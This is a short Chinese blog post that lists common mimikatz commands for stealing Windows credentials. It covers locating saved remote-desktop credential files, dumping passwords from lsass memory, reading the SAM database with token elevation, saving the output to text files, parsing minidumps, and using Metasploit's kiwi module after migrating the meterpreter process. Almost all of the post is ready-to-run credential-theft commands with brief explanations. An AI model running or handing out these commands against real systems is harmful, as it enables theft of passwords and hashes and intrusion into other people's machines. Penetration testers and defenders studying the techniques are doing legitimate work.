mimikatz常用命令

windows抓取保存的远程桌面凭证

查看本机连接过的机器,注意:普通用户只能看到此用户连接的机器,Administrator可以看到所有本机连接过的机器,使用mstsc连接某台机器的远程桌面时,如果勾选了下图中的记住凭据选项,则系统会将连接远程桌面的密码加密后存储到本地如下路径:%userprofile%\AppData\Local\Microsoft\Credentials*
判断当前系统是否使用提及方式保存的远程桌面连接密码。

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

mimikatz抓取服务器密码

在线读取lsass进程内存

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
privilege::debug          提升至DebugPrivilege权限
sekurlsa::logonpasswords  导出用户凭据

在线读取本地SAM文件

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
privilege::debug  用于提升至DebugPrivilege权限
token::elevate    提升至system权限
lsadump::sam      用于读取SAM文件

密码信息保存到txt文件

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit" > demo.txt
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" > demo1.txt

mimikatz解密dmp文件获取密码

sekurlsa::minidump proc_724.dmp
sekurlsa::logonPasswords full

msf利用mimikatz抓密码

通过加载Kiwi模块

kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。
限制如下图所示,此时需要将进程迁移至64位程序进制中:


load kiwi:加载kiwi模块
creds_all:该命令可以列举系统中的明文密码
ps:查看进程
migrate 504:进程迁移

如图,在进程为迁移之前获取不到密码信息。

posted @ 2025-01-09 14:28  yywdd  阅读(367)  评论(0)    收藏  举报